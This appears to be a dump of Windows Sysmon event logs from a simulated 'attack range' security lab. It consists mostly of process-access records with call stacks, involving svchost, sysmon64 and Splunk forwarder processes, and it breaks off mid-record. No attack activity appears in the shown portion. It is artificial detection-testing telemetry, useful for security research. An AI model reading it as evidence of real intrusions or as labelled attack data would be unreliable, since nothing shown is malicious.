11:30:46.695{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223796Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:46.695{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223795Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:46.695{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223794Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:46.695{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223793Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:46.695{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223792Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:46.695{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223791Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:46.695{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223790Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:46.695{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223789Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:46.695{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223788Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:46.695{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1AE6-6216-7305-000000003902}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223787Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:46.695{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1AE6-6216-7305-000000003902}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223786Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:46.696{4F8D34B0-1AE6-6216-7305-000000003902}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000223785Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:43.606{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51811-false10.0.1.12-8000- 23542300x8000000000000000300008Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:47.768{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F87EAE0B6712E0939CA0AC9724F2F3EF,SHA256=9222DACB58A5549F01099259840FD1D030B9619BC04B85C97A1F2589DA4AEA66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223816Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:47.820{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89BEBCF4DF77E6FF9E222E899658579E,SHA256=300E393380FA5B25FDAE56C657FE3B8F54D98E6B692AB6D072C5B3CC227E6B17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223815Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:47.742{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3C67B2F7CC722508005FFB6CD35BA29,SHA256=8BA6DFFC770E2BFAB4F38333A7D6946B781D08C052815040FEB7B087B95DD481,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223814Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:47.382{4F8D34B0-1AE7-6216-7405-000000003902}19362468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223813Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:47.195{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1AE7-6216-7405-000000003902}1936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223812Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:47.195{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223811Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:47.195{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223810Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:47.195{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223809Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:47.195{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223808Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:47.195{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223807Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:47.195{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223806Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:47.195{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223805Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:47.195{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223804Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:47.195{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223803Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:47.195{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1AE7-6216-7405-000000003902}1936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223802Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:47.195{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1AE7-6216-7405-000000003902}1936C:\Program 